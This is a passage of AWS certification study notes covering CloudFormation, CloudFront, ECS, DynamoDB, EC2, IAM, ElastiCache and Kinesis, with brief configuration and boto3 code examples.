    • The only required section in a template
    • The resources section represents the AWS components that the CF template will deploy
    • Resource type identifiers are in this format:
      • service-provider::service-name::data-type-name
  • Parameters

    • Provide input to your CF templates
  • Mappings

    • Fixed variables in your CF template used to differentiate between environments (dev vs. prod), regions, AMI types, etc.

    • To access values in a map, use Fn::FindInMap:

          {
            ...
            "Mappings" : {
              "RegionMap" : {
                "us-east-1" : {
                  "HVM64" : "ami-0ff8a91507f77f867", "HVMG2" : "ami-0a584ac55a7631c0c"
                },
                "us-west-1" : {
                  "HVM64" : "ami-0bdb828fd58c52235", "HVMG2" : "ami-066ee5fd4a9ef77f1"
                },
                "eu-west-1" : {
                  "HVM64" : "ami-047bb4163c506cd98", "HVMG2" : "ami-0a7c483d527806435"
                },
                "ap-southeast-1" : {
                  "HVM64" : "ami-08569b978cc4dfa10", "HVMG2" : "ami-0be9df32ae9f92309"
                },
                "ap-northeast-1" : {
                  "HVM64" : "ami-06cd52961ce9f0d85", "HVMG2" : "ami-053cdd503598e4a9d"
                }
              }
            },
      
            "Resources" : {
              "myEC2Instance" : {
                "Type" : "AWS::EC2::Instance",
                "Properties" : {
                  "ImageId" : {
                    "Fn::FindInMap" : [
                      "RegionMap",
                      {
                        "Ref" : "AWS::Region"
                      },
                      "HVM64"
                    ]
                  },
                  "InstanceType" : "m1.small"
                }
              }
            }
          }
      
  • Outputs

    • Optional
    • Output values can be referenced in other stacks
    • Use Fn::ImportValue
  • Conditions

    • Control the creation of resources or outputs based on a condition

Intrinsic Functions

  • Fn::Ref - Get a reference to the value of a parameter, the physical ID of a resource, etc.
  • Fn::GetAtt - Get attributes from a resource
  • Fn::FindInMap - Retrieve a value from a map
  • Fn::ImportValue - Import an output value from another template
  • Fn::Base64 - Convert a value to Base64 inside a template
  • Condition Functions (Fn::If, Fn::Not, Fn::Equals, etc.)
  • etc….

Service Roles

  • IAM roles that allow CloudFormation to create/update/delete stack resources

CloudFront

Introduction

  • Content Distribution Network (CDN) creates cached copies of your website at various Edge locations around the world
  • Content Delivery Network (CDN)
    • A CDN is a distributed network of servers which delivers web pages and content to users based on their geographical location, the origin of the webpage and a content delivery server
      • Can be used to deliver an entire website, including static, dynamic, and streaming content
      • 216 points of presence globally
      • DDoS protection since it is a global service. Integrates with AWS Shield and AWS WAF
      • Requests for content are served from the nearest Edge Location for the best possible performance

CloudFront Core Components

  • Origin
    • The location where all of the original files are located, for example an S3 bucket, EC2 instance, ELB, or Route 53
  • Edge Location
    • The location where web content will be cached. This is different than an AWS Region or AZ
  • Distribution
    • A collection of Edge locations which defines how cached content should behave

CloudFront Distributions

  • A distribution is a collection of Edge Locations. You specify the Origin, e.g. S3, EC2, ELB, Route53
  • It replicates copies based on your Price Class
  • There are two types of Distributions
    1. Web (for Websites)
    2. RTMP (for streaming media)
  • Behaviors
    • Redirect to HTTPS, Restrict HTTP Methods, Restrict Viewer Access, Set TTLs
  • Invalidations
    • You can manually invalidate cache on specific files via Invalidations
  • Error Pages
    • You can serve up custom error pages eg 404
  • Restrictions
    • You can use Geo Restriction to blacklist or whitelist specific countries

Lambda@Edge

  • Lambda@Edge functions are used to override the behavior of request and responses

  • Lambda@Edge lets you run Lambda functions to customize the content that CloudFront delivers, executing the functions in AWS locations closer to the viewer.

  • The functions run in response to CloudFront events, without provisioning or managing servers. You can use Lambda functions to change CloudFront requests and responses at the following points:

  • The 4 Available Edge Functions

    1. Viewer Request
      • When CloudFront receives a request from a Viewer
    2. Origin request
      • Before CloudFront forwards a request to the origin
    3. Origin response
      • When CloudFront receives a response from the origin
    4. Viewer response
      • Before CloudFront returns the response to the viewer

CloudFront Protection

  • By Default a Distribution allows everyone to have access
  • Origin Access Identity (OAI)
    • A virtual user identity that will be used to give your CloudFront Distribution permission to fetch a private object
  • In order to use Signed URLs or Signed Cookies you need to have an OAI
  • Signed URLs
    • (Not the same thing as S3 Presigned URLs)
      • A URL which provides temporary access to cached objects
  • Signed Cookies
    • A cookie which is passed along with the request to CloudFront. The advantage of using a Cookie is you want to provide access to multiple restricted files. eg. Video Streaming

Caching Policy

  • Each object in the cache will be identified by a cache key
  • Maximize the cache-hit-ratio by minimizing requests to the origin
  • Cache Key
    • a unique identifier for everything in the cache
    • by default, made up of the hostname and resource portion of the URL
    • The cache key can be customized by creating a CloudFront Cache Policy

Caching Behaviors

  • Configure different settings for a given URL path pattern
  • Example: configure a specific behavior for requests to /images/*.jpg
  • Route to different kinds of origins/origin groups based on the content-type or path.
  • Examples:
    • /images/* to S3
    • /login to EC2
    • /api to API Gateway

Geo-Restriction

  • Restrict who can access your CloudFront distribution based on the country the content is accessed from
  • You can create an AllowList or a BlockList

CloudFront Signed URL

  • Two types of signers:
    • Either a trusted key group (Recommended)
    • An AWS Account that contains a CloudFront Key Pair
  • In your distribution, create one or more trusted key groups

Pricing

  • You can reduce the number of edge locations for a cost savings
  • Price Classes
    • Price Class All: All regions, best performance
    • Price Class 200: most regions, but excludes the most expensive regions
    • Price Class 100: only the least expensive regions

Copilot

Introduction

  • CLI tool to build, release, and maintain production ready containerized apps
  • Helps you focus on building apps rather than setting up infrastructure
  • Automatically provisions all required infrastructure for a containerized app
  • Automate deployments using one command with CodePipeline
  • Deploy to ECS, Fargate, or App Runner

Elastic Container Registry

Introduction

  • Store container images in AWS, similar to DockerHub
  • Public or Private

Elastic Container Service

Introduction

IAM Roles for ECS

  • EC2 Instance Profile
    • Used by the ECS agent to make API calls to ECS Service, send container logs to CloudWatch, pull docker images from ECR, etc.
  • ECS Tasks:
    • Each ECS task gets a role. Applies to both EC2 and Fargate launch types
    • Task role is defined in the Task Definition

Load Balancer Integrations

  • ALB supports and works for most use cases
  • NLB is recommended only for high-throughput use cases

Data Volumes

  • Mount EFS file systems onto ECS Tasks
  • Works for both EC2 and Fargate Launch Types
  • Tasks running in any AZ will share the same data in the EFS file system
  • EFS + Fargate = serverless
  • S3 cannot be mounted as a file system in your ECS Tasks

ECS Service Auto-scaling

  • You can scale on 3 metrics
    • CPU
    • Memory
    • ALB Request Count
  • Types of Scaling:
    • Target Tracking: scale based on target value for a specific CloudWatch metric
    • Step Scaling: scale based on a specified CloudWatch Alarm
    • Scheduled Scaling: scale based on a specified date/time
  • Auto Scaling EC2 instances
    • Use an Auto Scaling Group
      • Scale based on CPU usage
    • ECS Cluster Capacity Provider
      • Used to automatically provision and scale the infrastructure of your ECS Tasks
      • Capacity Provider is paired with an auto-scaling group
      • Add EC2 instances when you are out of usable capacity (CPU, RAM, etc…)

ECS Rolling Updates

  • When updating versions of an ECS service, we can control how many tasks can be started and stopped, and in which order
  • Rolling Updates

ECS Tasks Definitions

  • Task definitions are metadata in JSON form that tell ECS how to run a container
  • How can we add environment variables to an ECS Task?
    • Hardcoded - URLs for example
    • SSM Parameter Store - sensitive variables such as API keys
    • Secrets Manager - Sensitive variables
  • Bind mounts
  • Essential Container - if a container marked essential fails or stops, all the other containers in the task will stop

ECS Task Placement

  • When a Task Definition for EC2 is created, ECS must determine where to schedule it

  • When a service scales in, ECS must determine which tasks to kill

  • To help with this, you can define a task placement strategy and task placement constraint

  • Task placement strategies and constraints only work on EC2 launch types

  • How does this work?

    • ECS will first determine where it is possible to place the task. Which nodes have enough resources?
    • ECS will then determine which EC2 instances satisfy the task placement constraints
    • ECS will then determine which EC2 instances satisfy the task placement strategy
    • ECS will then schedule the task
  • Task Placement Strategies

    • BinPack: Schedule tasks based on the least available amount of CPU or memory
      • i.e. pack as many containers as possible on a node before scheduling containers on other nodes
    • Random: Place the task randomly
    • Spread: Spread instances across nodes based on a specified value (AZ, instanceId, etc.)
  • Task Placement Constraints

    • distinctInstance: Each task should be placed on a separate EC2 instance
    • memberOf: Schedule tasks on instances that satisfy an expression written in the cluster query language

DynamoDB

Introduction

  • Fully managed, highly available with replication across AZs
  • NoSQL Database
  • Scales to massive workloads, highly distributed database
  • Fully integrates with IAM
  • Enable event driven programming with DynamoDB streams

Basics

  • DynamoDB is made of tables
  • Each table has a primary key (must be decided at creation time)
  • Each table can have an infinite number of rows (rows are items)
    • Each row can have a max of 400KB of data

Primary keys

  • how to choose a primary key?
  • Two types of primary keys
    • partition keys
      • Partition key must be unique for each item
      • Partition key must be ‘diverse’ so that data is distributed
    • partition key + sort key
      • data is grouped by partition key
      • each combination must be unique per item

Read/Write Capacity Modes

  • Provisioned Mode
    • Provision all capacity in advance by providing values for RCU and WCU
    • Pay up front
    • Throughput can temporarily be exceeded using a burst capacity
    • If you exhaust the burst capacity, you can retry using exponential backoff (see the sketch after this list)
  • On-demand Mode
    • Reads/writes scale on-demand
    • Pay for what you use
  • You can switch between the two modes once every 24 hours
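
A minimal backoff-and-retry sketch around a DynamoDB write, assuming boto3; the table name and item are hypothetical (note that boto3 also has built-in retries):

import random
import time

import boto3
from botocore.exceptions import ClientError

table = boto3.resource("dynamodb").Table("my-table")   # hypothetical table

def put_with_backoff(item, max_attempts=5):
    """Retry throttled writes with exponential backoff plus jitter."""
    for attempt in range(max_attempts):
        try:
            return table.put_item(Item=item)
        except ClientError as e:
            if e.response["Error"]["Code"] != "ProvisionedThroughputExceededException":
                raise
            time.sleep((2 ** attempt) * 0.1 + random.random() * 0.1)
    raise RuntimeError("still throttled after retries")

put_with_backoff({"pk": "user#42", "name": "example"})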

Local Secondary Index

  • Alternate sort key for your table
  • Must be defined at table creation time
  • Up to 5 local secondary indexes per table
  • The sort key consists of one scalar attribute (string, number, or binary)

Global Secondary Index

  • Alternative primary key from the base table

PartiQL

  • Use SQL-like syntax to query DynamoDB tables

Optimistic Locking

  • DynamoDB has a feature called “conditional writes” to ensure an item has not changed before writing to it
  • Each item has an attribute that acts as a version number
  • Useful when you have multiple writers attempting to write to the same item
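
A sketch of such a conditional write with boto3; the table name and attribute names are assumptions:

import boto3
from botocore.exceptions import ClientError

table = boto3.resource("dynamodb").Table("items")      # hypothetical table

def update_if_unchanged(pk, expected_version, new_payload):
    """Only write if the stored version number still matches what we read."""
    try:
        table.update_item(
            Key={"pk": pk},
            UpdateExpression="SET payload = :p, #v = :new",
            ConditionExpression="#v = :expected",
            ExpressionAttributeNames={"#v": "version"},   # hypothetical version attribute
            ExpressionAttributeValues={
                ":p": new_payload,
                ":new": expected_version + 1,
                ":expected": expected_version,
            },
        )
        return True
    except ClientError as e:
        if e.response["Error"]["Code"] == "ConditionalCheckFailedException":
            return False   # another writer won; re-read the item and retry
        raise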

DynamoDB Accelerator (DAX)

  • Fully managed, highly available, seamless in-memory cache for DynamoDB
  • Microseconds latency for cached reads and queries
  • Does not require that you change any application code
  • Solves the “hot key” problem. If you read a specific key (item) too many times, you may get throttled.
  • 5 minutes TTL for cache (default)
  • Up to 10 DAX nodes per cluster
  • Multi-AZ (3 nodes minimum recommended for production)
  • Secure (Encryption in transit and at rest)

DynamoDB Streams

  • A stream is an ordered flow of item-level modifications (create/update/delete) in a table
  • Stream records can be:
    • Sent to Kinesis Data Streams
    • Read by AWS Lambda
    • Read by Kinesis Client Library Apps
  • Data retention for up to 24 hours
  • Use cases:
    • react to changes in real-time
    • Analytics
    • Insert into derivative tables
    • Insert into OpenSearch service

EC2

Introduction

  • EC2 is Amazon’s Elastic Compute Cloud
  • It consists of virtual machines, storage, load balancers, and auto scaling of VMs
  • You can run Windows, Linux, or MacOS
  • You can choose how many vCPUs and how much RAM you want
  • You can choose how much storage space you want
  • You can choose what type of network card and whether or not you need a public IP (Elastic IP)
  • You can run a bootstrap script at launch time called “user data”. The script is only run once when the instance first starts.
  • You can configure firewall rules via a Security Group

Budgets

  • You can create a budget and alert to ensure you don’t go over a certain cost
  • You need to enable “IAM user and role access to Billing information” in your account settings

Instance Types

  • General Purpose
    • Balance between compute, memory, and networking
    • Great for diversity of workloads such as web servers or code repositories
  • Compute Optimized
    • Optimized for compute intensive tasks
    • Examples: Machine Learning, batch processing, HPC, etc.
  • Memory Optimized
    • Optimized for memory intensive tasks
    • High performance databases or caches
  • Storage Optimized
    • Example use cases: OLTP, databases, caches, etc.
  • Accelerated Computing
    • HPC

Example:

m5.2xlarge
| |   |
| |   +-- 2xlarge: size within instance class
| +------ 5: generation
+--------- m: instance class

Security Groups

  • Security groups are like a firewall scoped to the EC2 instance
  • Security groups only contain allow rules
  • Security groups are stateful
  • Security groups can have a source of IP/range or another security group
  • An instance can have multiple security groups attached
  • A security group can be attached to multiple instances
  • Security groups are region-locked

Ports to know for the exam

  • 21 = FTP
  • 22 = SSH/sFTP
  • 80 = HTTP
  • 443 = HTTPS
  • 3389 = RDP
  • 5432 = PostgreSQL
  • 3306 = MySQL / MariaDB
  • 1521 = Oracle
  • 1433 = MSSQL

EC2 Purchasing Options

  • On-Demand
    • Short workload, predictable pricing
    • Linux or Windows is billed per second. Other operating systems are billed per hour
  • Reserved
    • 1 to 3 years commitment
    • Used for long workloads
    • Up to a 72% discount compared to on-demand
    • Pay upfront, partially upfront, or no upfront
    • Scoped to a region or zone
    • You can buy or sell them in the Reserved Instances Marketplace
  • Savings Plan
    • Up to a 72% discount compared to on-demand
    • Commit to a certain type of usage (example: $10/hour for 1 to 3 years). Usage beyond the commitment is billed at the on-demand price
    • Locked to a specific instance family and AWS region (example: M5 in us-east-1)
    • 1 to 3 years commitment
    • Commit to an amount of usage
  • Spot Instances
    • Short workloads, cheap, less reliable
    • The MOST cost efficient option
    • Workload must be resilient to failure
  • Dedicated Hosts
    • Reserve an entire physical server, control instance placement
    • Allows you to address compliance or license requirements
    • Purchasing Options:
      • On-demand
      • Reserved for 1 to 3 years
    • The most expensive option
  • Dedicated Instances
    • No other customers will share your hardware
    • You may share the hardware with other instances in the same account
    • No control over the instance placement
  • Capacity Reservation
    • Reserve capacity in a specific AZ for any duration
    • You always have access to the EC2 capacity when you need it
    • No time commitment (create/cancel anytime)
    • Combine with regional reserved instances or a savings plan for cost savings
    • Even if you don’t launch instances, you still get charged

EBS Volumes

  • An EBS (Elastic Block Store) volume is a network drive which you can attach to your instances while they run
  • EBS volumes are bound to a specific Availability Zone
    • To move an EBS volume to another AZ, you must first snapshot it and then copy the snapshot
  • EBS volumes have a provisioned capacity
    • You are billed for the provisioned capacity
  • IOPS typically scale with capacity (i.e. larger volumes have better performance)
  • EBS volumes have a “Delete on Termination” attribute. This is enabled for the root volume by default, but not for other volumes

EBS Volume Snapshots

  • To move an EBS volume to another AZ, you must first snapshot it and then copy the snapshot
  • EBS Snapshot Archive
    • Gives you the ability to move snapshots to the archive tier, which is up to 75% cheaper
    • Takes 24-72 hours to restore the snapshot
  • EBS Snapshot Recycle Bin
    • Allows you to restore deleted snapshots
    • Retention can be 1 day to 1 year
  • Fast Snapshot Restore
    • Force full initialization of the snapshot to have no latency on first use
    • can be very expensive

AMI (Amazon Machine Image)

  • VM Image

  • AMIs are built for a specific region and can be copied to other regions

  • AMI Types:

    • Private
    • Public
    • MarketPlace
  • AMI Creation Process

    • Start instance and customize it
    • Stop the instance
    • Capture the AMI

EC2 Instance Store

  • Storage mounted in an EC2 instance that is local to the physical host
  • High performance
  • The storage is wiped when the EC2 instance stops or is terminated
  • Use cases: cache, temporary content, or scratch space

EBS Volume Types

  • GP2/GP3 - General SSD

    • 1 GB up to 16 TB
  • IO1/IO2 - High performance SSD

  • ST1 (hdd) - low cost HDD volume

  • SC1 (hdd) - Lowest cost HDD volume

  • Only GP2/3 and IO1/2 can be used as root (bootable) volumes

EBS Multi-attach

  • Attach the same EBS volume to multiple instances (up to 16) in the same AZ
  • Only available for IO1/IO2 family of EBS volumes
  • Each instance will have read/write access to the volume
  • You must use a file system that is cluster aware

EFS

  • Managed NFS (Network File System)

  • Pay per use

  • 3x more expensive than a GP2 EBS volume

  • Can be mounted on different EC2 instances in different Availability Zones

  • EFS Scale

    • 1000s of concurrent clients, 10 GB+ throughput
    • Grow to petabyte scale network file system, automatically
    • Performance Classes:
      • Performance Mode:
        • General purpose: latency sensitive use cases (web server, CMS, etc…)
        • Max I/O: higher latency, throughput, highly parallel (big data, media processing)
      • Throughput Mode:
        • Bursting: 1 TB = 50 MB/s + burst up to 100 MB/s
        • Provisioned - set your throughput regardless of storage size
        • Elastic - Automatically scales throughput up or down based on your workloads
    • Storage Classes:
      • Storage Tiers (move files to another tier after ‘x’ number of days)
        • Standard
        • Infrequent Access
        • Archive
      • Implement lifecycle policies to move files between tiers

Elastic Load Balancer (ELB)

  • Load balancers forward traffic to multiple backend servers

  • ELB is a managed load balancer

  • ELB is integrated with many AWS offerings and services

  • ELB supports health checks to verify if a backend instance is working before forwarding traffic to it

  • Types of load balancers on AWS:

    • Application Load Balancer

      • Layer 7
        • Supports HTTP/2 and WebSockets
      • Supports HTTP redirects
      • Supports URL path routing, hostname routing, query string routing, header routing
      • Backend instances are grouped into a Target Group
      • You get a fixed hostname
      • The app servers don’t see the IP of the client directly
        • If the app servers need to know the client IP/port/protocol, they can check the following headers:
          • X-Forwarded-For
          • X-Forwarded-Proto
          • X-Forwarded-Port
    • Network Load Balancer

      • Layer 4
        • Supports UDP and TCP
      • High performance
      • One static IP per availability zone
    • Gateway Load Balancer

      • Layer 3
      • Used for 3rd party network appliances on AWS, example: Firewalls
      • Extremely high performance
      • Supports the GENEVE protocol
    • Target Groups

      • EC2 Instances
      • ECS Tasks
      • Lambda Functions
      • Private IP addresses
    • Sticky Sessions

      • Cookie Names

        • Application-based cookies
          • Custom Cookie
            • Generated by the target
            • Can include any custom attributes required by the application
            • Cookie name must be specified individually for each target group
            • You cannot use AWSALB, AWSALBAPP, or AWSALBTG (these are reserved by the ELB)
          • Application Cookie
            • Generated by the load balancer
            • Cookie name is AWSALBAPP
        • Duration-based Cookie
          • Cookie generated by the load balancer
          • Cookie name is AWSALB for ALB, AWSELB for CLB
    • Cross-zone load balancing

      • Each load balancer instance distributes traffic evenly across all registered instances in all availability zones

Autoscaling Groups

  • Scale out EC2 instances to match increased load or scale in to match a decreased load
  • Specify parameters to have a minimum and maximum number of instances
  • Automatically replace failed instances
  • Uses a launch template

IMDS

  • IMDSv1 vs. IMDSv2
    • IMDSv1 is accessing http://169.254.169.254/latest/meta-data directly
    • IMDSv2 is more secure and is done in two steps
      1. get a Session token
      2. Use session token in the IMDSv2 calls
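
A sketch of those two steps with Python's requests; it only works from inside an EC2 instance, and the token TTL is just an example:

import requests

BASE = "http://169.254.169.254"

# Step 1: get a session token
token = requests.put(
    f"{BASE}/latest/api/token",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
    timeout=2,
).text

# Step 2: use the token on metadata calls
instance_id = requests.get(
    f"{BASE}/latest/meta-data/instance-id",
    headers={"X-aws-ec2-metadata-token": token},
    timeout=2,
).text
print(instance_id)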

Elasticache

Introduction

  • Fully managed Redis or Memcached instances
  • Caches are in-memory databases with high-performance and low latency
  • Helps to reduce load from databases
  • Helps to make your application stateless
  • Requires that your application be architected with a cache in mind

Redis

  • Supports multi-AZ with auto-failover
  • Supports read-replicas to scale out reads
  • Backup and restore features
  • Supports sets and sorted sets

Memcached

  • Multi-node for partitioning of data (Sharding)
  • Lacks the features Redis supports (no replication, no backup and restore)

Caching Implementation Considerations

  • Is it safe to cache the data?
    • Data may be out of date (eventually consistent)
  • Is caching effective for that data?
    • Patterns: data changing slowly, few keys are frequently updated
    • Anti-patterns: data changing rapidly, a large key space that is all frequently needed
  • Is data structured for caching?
    • example: key value caching or caching of aggregations result

Caching design patterns

Lazy Loading / Cache-Aside / Lazy Population

Write-through
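
Lazy loading (cache-aside) populates the cache only on a read miss; write-through updates the cache whenever the database is written. A minimal sketch of both, assuming redis-py and a reachable Redis/ElastiCache endpoint (the DB helpers are placeholder stubs):

import json

import redis   # assumes redis-py: pip install redis

r = redis.Redis(host="my-cache.example.com", port=6379)   # hypothetical endpoint

def fetch_user_from_db(user_id):
    return {"id": user_id, "name": "example"}   # stand-in for a real DB query

def write_user_to_db(user):
    pass                                        # stand-in for a real DB write

def get_user(user_id, ttl=300):
    """Lazy loading / cache-aside: check the cache first, populate it on a miss."""
    key = f"user:{user_id}"
    cached = r.get(key)
    if cached is not None:
        return json.loads(cached)                  # cache hit
    user = fetch_user_from_db(user_id)             # cache miss -> read the database
    r.setex(key, ttl, json.dumps(user))            # populate the cache for next time
    return user

def save_user(user, ttl=300):
    """Write-through: update the database and the cache in the same code path."""
    write_user_to_db(user)                                   # source of truth first
    r.setex(f"user:{user['id']}", ttl, json.dumps(user))     # keep the cache in sync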

Cache Evictions and TTL

  • Cache eviction can occur in 3 ways:
    • You delete the item in the cache
    • Item is evicted because the memory is full and it's not recently used (LRU)
    • The TTL (time to live) has expired
      • TTL can range from a few seconds to days

IAM

Introduction

  • IAM is Identity and Access Management
  • IAM is a global service
  • Do not use the root account, create user accounts instead

Users and Groups

  • Groups can only contain users, not other groups
  • Users do not need to belong to a group. Users can belong to multiple groups

IAM Policies

  • Users and groups can be assigned a policy called an IAM policy. IAM policies are JSON documents:

        {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "EnableDisableHongKong",
                    "Effect": "Allow",
                    "Action": [
                        "account:EnableRegion",
                        "account:DisableRegion"
                    ],
                    "Resource": "*",
                    "Condition": {
                        "StringEquals": {"account:TargetRegion": "ap-east-1"}
                    }
                },
                {
                    "Sid": "ViewConsole",
                    "Effect": "Allow",
                    "Action": [
                        "account:ListRegions"
                    ],
                    "Resource": "*"
                }
            ]
        }
    
  • IAM policy inheritance

    • inline policies are attached directly to users
    • If an IAM policy is attached to a group, any users in that group will inherit settings from the policy

Password Policy

MFA (Multi-factor authentication)

  • Virtual MFA device
    • Google Authenticator
    • Authy
  • Universal 2nd Factor Security Key
    • YubiKey
  • Hardware Key Fob
    • Also has a special option for GovCloud

IAM Roles

  • Allows AWS service to perform actions on your behalf. When creating the role, you choose which service the role will apply to (For example, EC2)
  • Assign permissions to AWS services with IAM roles

IAM Security Tools

  • IAM Credentials Report
    • A report that lists all user accounts and status of their credentials
  • IAM Access Advisor
    • Access advisor shows the service permissions granted to a user and when those services were last accessed

Kinesis

Introduction

  • Kinesis is a set of services provided by AWS
    • Kinesis Data Streams: capture, process, and store data streams
    • Kinesis Data Firehose: load data streams into AWS data stores
    • Kinesis Data Analytics: analyze data streams with SQL or Apache Flink
    • Kinesis Video Streams: Capture, process and store video streams

Kinesis Data Firehose

  • Records up to 1 MB can be sent to Kinesis Data Firehose, and Firehose will then batch writes to other resources in near real-time
  • Fully managed by AWS, autoscales
  • Pay only for the data going through Firehose
  • Producers such as (Applications, Kinesis Agent, Kinesis Data Streams, CloudWatch, AWS IoT) can write to Firehose, and Firehose will then send the data to S3, RedShift, or OpenSearch
  • Data Firehose can also send to 3rd parties such as Splunk, Datadog, etc.
  • You can transform data using Lambda functions before sending it to the destination

Kinesis Streams

Collect and process large streams of data in real-time.

Use Cases:

  • Fast (second/millisecond latency) processing of log events
  • Real-time metrics and reporting
  • Data analytics
  • Complex stream processing

Kinesis Libraries / Tools:

Producing Data:

  • Kinesis Producer Library (KPL)

    • Blog post: Implementing Efficient and Reliable Producers with the Amazon Kinesis Producer Library
    • Auto-retry configurable mechanism
    • Supports two complementary ways of batching:
      • Collection (of stream records):
        • Buffers/collects records to write multiple records to multiple shards in a single request.
        • RecordMaxBufferedTime: max time a record may be buffered before a request is sent. Larger = more throughput but higher latency.
      • Aggregation (of user records):
        • Combines multiple user records into a single Kinesis stream record (using PutRecords API request).
        • KCL integration (for deaggregating user records).
  • Kinesis Agent

    • Standalone application that you can install on the servers you’re interested in.
    • Features:
      • Monitors file patterns and sends new data records to delivery streams
      • Handles file rotation, checkpointing, and retry upon failure
      • Delivers all data in a reliable, timely, and simple manner
      • Emits CloudWatch metrics for monitoring and troubleshooting
      • Allows preprocessing data, e.g., converting multi-line record to single line, converting from delimiter to JSON, converting from log to JSON.

Kinesis Streams API:

Reading Data:

  • Kinesis Client Library (KCL)
    • The KCL ensures there is a record processor running and processing each shard.
    • Uses a DynamoDB table to store control data. It creates one table per application that is processing data.
    • Creates a worker thread for each shard. Auto-assigns shards to workers (even workers on different EC2 instances).
    • KCL Checkpointing
      • Last processed record sequence number is stored in DynamoDB.
      • On worker failure, KCL restarts from last checkpointed record.
      • Supports deaggregation of records aggregated with KPL.
      • Note: KCL may be bottlenecked by DynamoDB table (throwing Provisioned Throughput Exceptions). Add more provisioned throughput to the DynamoDB table if needed.

Emitting Data:

  • Kinesis Connector Library (Java) for KCL
    • Connectors for: DynamoDB, Redshift, S3, Elasticsearch.
    • Java library with the following steps/interfaces:
      • ITransformer: maps from stream records to a user-defined data model.
      • IFilter: removes irrelevant records.
      • IBuffer: buffers based on a size limit and total byte count.
      • IEmitter: sends the data in the buffer to AWS services.
      • S3Emitter: writes buffer to a single file.

Kinesis Stream API:

  • PutRecord (single record per HTTP request)
  • PutRecords (multiple records per single HTTP request). Recommended for higher throughput.
    • Single record failure does not stop the processing of subsequent records.
    • Will return HTTP 200 as long as some records succeed (even when others failed).
    • Retry requires application code in the producer to examine the PutRecordsResult object and retry whichever records failed.
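
A minimal boto3 sketch of that retry pattern, assuming a stream named my-stream (a real producer would also back off between attempts):

    import boto3

    kinesis = boto3.client("kinesis")
    records = [{"Data": b"hello", "PartitionKey": "user-1"},
               {"Data": b"world", "PartitionKey": "user-2"}]

    # PutRecords returns HTTP 200 even with partial failures, so inspect the result
    while records:
        resp = kinesis.put_records(StreamName="my-stream", Records=records)
        if resp["FailedRecordCount"] == 0:
            break
        # Keep only the records whose per-record result carries an ErrorCode, then retry
        records = [rec for rec, result in zip(records, resp["Records"])
                   if "ErrorCode" in result]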

Key Concepts

Kinesis Data Streams:

  • Stream big data into AWS

  • Kinesis Data Streams

  • A stream is a set of shards. Each shard is a sequence of data records.

    • Shards are numbered (shard1, shard2, etc.)
  • Each data record has a sequence number that is assigned automatically by the stream.

  • A data record has 3 parts:

    • Sequence number
    • Partition key
    • Data blob (immutable sequence of bytes, up to 1 MB).
  • Sequence number is only unique within its shard.

  • Retention Period:

    • Retention for messages within a Data Stream can be set to 1 - 365 days
    • You pay more for longer retention periods.
  • Consumers and Producers

    • producers send data (records) into data streams
      • records consist of a partition key and a data blob
      • producers can send 1MB/sec or 1000 msg/sec per shard
    • Consumers receive data from data streams
      • consumers can be apps, lambda functions, Kinesis Data Firehose, or Kinesis Data Analytics
      • Consumers can receive messages at 2 MB/sec (shared version, across all consumers) per shard or 2 MB/sec (enhanced version) per consumer per shard
  • Once data is inserted into Kinesis, it cannot be deleted

  • Capacity Modes:

    • Provisioned Mode
      • Choose the number of shards to provision
      • Scale manually
      • Each shard gets 1 MB/s in and 2 MB/s out
      • Pay per shard provisioned per hour
    • On-demand Mode:
      • No need to provision or manage capacity
      • Auto-scaling
      • Pay per stream per hour and data in/out per GB
  • Access control to Data Streams using IAM policies

  • Encryption in flight with HTTPS and at rest with KMS

  • Kinesis Data Streams support VPC Endpoints

  • Monitor API calls using CloudTrail

Kinesis Application Name:

  • Each application must have a unique name per (AWS account, region). The name is used to identify the DynamoDB control table and the namespace for CloudWatch metrics.

Partition Keys:

  • Used to group data by shard within a stream. It must be present when writing to the stream.
  • When writing to a stream, Kinesis separates data records into multiple shards based on each record’s partition key.
  • Partition keys are Unicode strings with a maximum length of 256 bytes. An MD5 hash function is used to map partition keys to 128-bit integer values that define which shard records will end up in.
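
A small illustration of that mapping: the record lands in whichever shard owns the hash key range containing this 128-bit value.

    import hashlib

    def partition_key_hash(key: str) -> int:
        """Map a partition key to the 128-bit integer used to pick a shard."""
        return int(hashlib.md5(key.encode("utf-8")).hexdigest(), 16)

    print(partition_key_hash("user-42"))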

Kinesis Shard:

  • Uniquely identified group of data records in a stream.
  • Multiple shards in a stream are possible.
  • Single shard capacity:
    • Write: 1 MB/sec input, 1000 writes/sec.
    • Read: 2 MB/sec output, 5 read transactions/sec.
  • Resharding:
    • Shard split: divide a shard into two shards.
      • Example using boto3 (splitting the only shard at the midpoint of its hash key range):
        import boto3

        kinesis = boto3.client("kinesis")
        shard = kinesis.describe_stream(StreamName="BotoDemo")["StreamDescription"]["Shards"][0]  # we only have one shard!
        hkey = int(shard["HashKeyRange"]["EndingHashKey"])  # StartingHashKey is 0, so hkey // 2 is the midpoint
        kinesis.split_shard(StreamName="BotoDemo", ShardToSplit=shard["ShardId"], NewStartingHashKey=str(hkey // 2))
        
    • Shard merge: merge two shards into one.

Kinesis Server-Side Encryption:

  • Can automatically encrypt data written, using KMS master keys. Both producer and consumer must have permission to access the master key.
  • Add kms:GenerateDataKey to producer’s role.
  • Add kms:Decrypt to consumer’s role.

Kinesis Firehose:

  • Managed service for loading data from streams directly into S3, Redshift, and Elasticsearch.
  • Fully managed: scalability, sharding, and monitoring with zero admin.
  • Secure.
  • Methods to Load Data:
    • Use Kinesis Agent.
    • Use AWS SDK.
    • PutRecord and PutRecordBatch.
    • Firehose to S3:
      • Buffering of data before sending to S3. Sends whenever any of these conditions is met:
        • Buffer size (from 1 MB to 128 MB).
        • Buffer interval (from 60s to 900s).
      • Can invoke AWS Lambda for data transformation.
        • Data flow:
          1. Buffers incoming data up to 3 MB or the buffering size specified, whichever is lower.
          2. Firehose invokes Lambda function.
          3. Transformed data is sent from Lambda to Firehose for buffering.
          4. Transformed data is delivered to the destination.
        • Response from Lambda must include (a minimal handler sketch follows this list):
          • recordId: must be the same as prior to transformation.
          • result: status, one of: “Ok”, “Dropped”, “ProcessingFailed”.
          • data: Transformed data payload.
        • Failure handling of data transformation:
          • 3 retries.
          • Invocation errors logged in CloudWatch Logs.
          • Unsuccessful records are stored in processing_failed folder in S3.
          • It’s possible to store the source records in S3, prior to transformation (Backup S3 bucket).
  • Data Delivery Speed:
    • S3: based on buffer size/buffer interval.
    • Redshift: depending on how fast the Redshift cluster finishes the COPY command.
    • Elasticsearch: depends on buffer size (1-100 MB) and buffer interval.
  • Firehose Failure Handling:
